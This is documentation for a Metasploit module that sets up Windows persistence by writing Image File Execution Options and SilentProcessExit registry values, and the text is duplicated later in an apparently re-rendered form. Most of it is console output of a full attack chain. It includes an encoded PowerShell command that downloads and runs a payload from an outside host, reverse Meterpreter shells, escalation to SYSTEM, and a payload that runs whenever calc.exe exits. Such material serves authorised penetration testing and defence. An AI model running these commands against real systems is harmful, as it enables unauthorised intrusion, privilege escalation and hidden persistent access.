documentation/modules/exploit/windows/persistence/image_exec_options.md

## Description

This module leverages Windows debugging tools to cause a payload to launch
every time a specified binary exits.

The payload will execute at the same priv level as the launched binary.

## Vulnerable Target

Windows 7+ as elevated user

## Verification Steps

1. Start msfconsole
2. Get a shell/meterpreter on a windows box
3. Do: `use exploit/windows/persistence/image_exec_options `
4. Do: `set session #`
5. Do: `run`
6. You should get persistence once the targeted application is open and closed.

## Options

### PAYLOAD_NAME

Name of the payload file. Defaults to `<random>.exe`

### IMAGE_FILE

The executable to bind to. Example: `calc.exe`, `notepad.exe`

## Scenarios

### Windows 10

Original Shell

```
└─$ ./msfconsole -q
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> run
[-] Exploit failed: cmd/linux/http/x64/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4449 
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABkAG4AbAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABkAG4AbAAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGQAbgBsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBhAGYAbwBvAFkATwByAGMAYgA5AHEAYgBwAE8ATQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
msf exploit(multi/script/web_delivery) > 
[*] 2.2.2.2     web_delivery - Delivering AMSI Bypass (1386 bytes)
[*] 2.2.2.2     web_delivery - Powershell command length: 3727
[*] 2.2.2.2     web_delivery - Delivering Payload (3727 bytes)
[*] Sending stage (203846 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:52295) at 2025-09-23 17:10:43 -0400

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```

Persistence

```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/image_exec_options 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/image_exec_options) > set session 1
session => 1
msf exploit(windows/persistence/image_exec_options) > set IMAGE_FILE calc.exe
IMAGE_FILE => calc.exe
msf exploit(windows/persistence/image_exec_options) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/image_exec_options) > rexploit
[*] Reloading module...
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/image_exec_options) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Attempting Persistence on WIN10PROLICENSE via session ID: 1
[*] Payload pathname = C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe
[*] Writing GlobalFlag to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe
[*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe
[*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe
[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc
```

Open `calc.exe` on the target machine

```
[*] Sending stage (177734 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:52327) at 2025-09-23 17:18:33 -0400

msf exploit(windows/persistence/image_exec_options) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> rm C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe
[-] stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /f" -H
Process 7092 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /f" -H
Process 7568 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /f" -H
Process 2604 created.
meterpreter > 
```
modern persistence for windows image_exec_options 2025-09-23 17:25:27 -04:00			`## Description`

			`This module leverages Windows debugging tools to cause a payload to launch`
			`every time a specified binary exits.`

			`The payload will execute at the same priv level as the launched binary.`

			`## Vulnerable Target`

			`Windows 7+ as elevated user`

			`## Verification Steps`

			`1. Start msfconsole`
			`2. Get a shell/meterpreter on a windows box`
			3. Do: `use exploit/windows/persistence/image_exec_options `
			4. Do: `set session #`
			5. Do: `run`
			`6. You should get persistence once the targeted application is open and closed.`

			`## Options`

			`### PAYLOAD_NAME`

			Name of the payload file. Defaults to `<random>.exe`

			`### IMAGE_FILE`

			The executable to bind to. Example: `calc.exe`, `notepad.exe`

			`## Scenarios`

			`### Windows 10`

			`Original Shell`

			```
			`└─$ ./msfconsole -q`
			`[*] Processing /root/.msf4/msfconsole.rc for ERB directives.`
			`resource (/root/.msf4/msfconsole.rc)> setg verbose true`
			`verbose => true`
			`resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`payload => cmd/linux/http/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery`
			`[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> run`
			`[-] Exploit failed: cmd/linux/http/x64/meterpreter/reverse_tcp is not a compatible payload.`
			`[*] Exploit completed, but no session was created.`
			`resource (/root/.msf4/msfconsole.rc)> set target 2`
			`target => 2`
			`resource (/root/.msf4/msfconsole.rc)> set srvport 8085`
			`srvport => 8085`
			`resource (/root/.msf4/msfconsole.rc)> set uripath w2`
			`uripath => w2`
			`resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp`
			`payload => windows/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set lport 4449`
			`lport => 4449`
			`resource (/root/.msf4/msfconsole.rc)> run`
			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`
			`[*] Started reverse TCP handler on 1.1.1.1:4449`
			`[*] Using URL: http://1.1.1.1:8085/w2`
			`[*] Server started.`
			`[*] Run the following command on the target machine:`
			powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABkAG4AbAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABkAG4AbAAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGQAbgBsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBhAGYAbwBvAFkATwByAGMAYgA5AHEAYgBwAE8ATQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
			`msf exploit(multi/script/web_delivery) >`
			`[*] 2.2.2.2 web_delivery - Delivering AMSI Bypass (1386 bytes)`
			`[*] 2.2.2.2 web_delivery - Powershell command length: 3727`
			`[*] 2.2.2.2 web_delivery - Delivering Payload (3727 bytes)`
			`[*] Sending stage (203846 bytes) to 2.2.2.2`
			`[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:52295) at 2025-09-23 17:10:43 -0400`

			`msf exploit(multi/script/web_delivery) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > getsystem`
			`...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).`
			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > sysinfo`
			`Computer : WIN10PROLICENSE`
			`OS : Windows 10 22H2+ (10.0 Build 19045).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x64/windows`
			`meterpreter > background`
			`[*] Backgrounding session 1...`
			```

			`Persistence`

			```
			`msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/image_exec_options`
			`[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`msf exploit(windows/persistence/image_exec_options) > set session 1`
			`session => 1`
			`msf exploit(windows/persistence/image_exec_options) > set IMAGE_FILE calc.exe`
			`IMAGE_FILE => calc.exe`
			`msf exploit(windows/persistence/image_exec_options) > set payload windows/meterpreter/reverse_tcp`
			`payload => windows/meterpreter/reverse_tcp`
			`msf exploit(windows/persistence/image_exec_options) > rexploit`
			`[*] Reloading module...`
			`[*] Exploit running as background job 4.`
			`[*] Exploit completed, but no session was created.`

			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`msf exploit(windows/persistence/image_exec_options) > [*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Likely exploitable`
			`[*] Attempting Persistence on WIN10PROLICENSE via session ID: 1`
			`[*] Payload pathname = C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe`
			`[*] Writing GlobalFlag to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe`
			`[*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe`
			`[*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe`
			`[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe`
			`[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc`
			```

			Open `calc.exe` on the target machine

			```
			`[*] Sending stage (177734 bytes) to 2.2.2.2`
			`[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:52327) at 2025-09-23 17:18:33 -0400`

			`msf exploit(windows/persistence/image_exec_options) > sessions -i 3`
			`[*] Starting interaction with 3...`

			`meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc`
			`[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc for ERB directives.`
			`resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> rm C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe`
			`[-] stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.`
			`resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /f" -H`
			`Process 7092 created.`
			`resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /f" -H`
			`Process 7568 created.`
			`resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /f" -H`
			`Process 2604 created.`
			`meterpreter >`
			```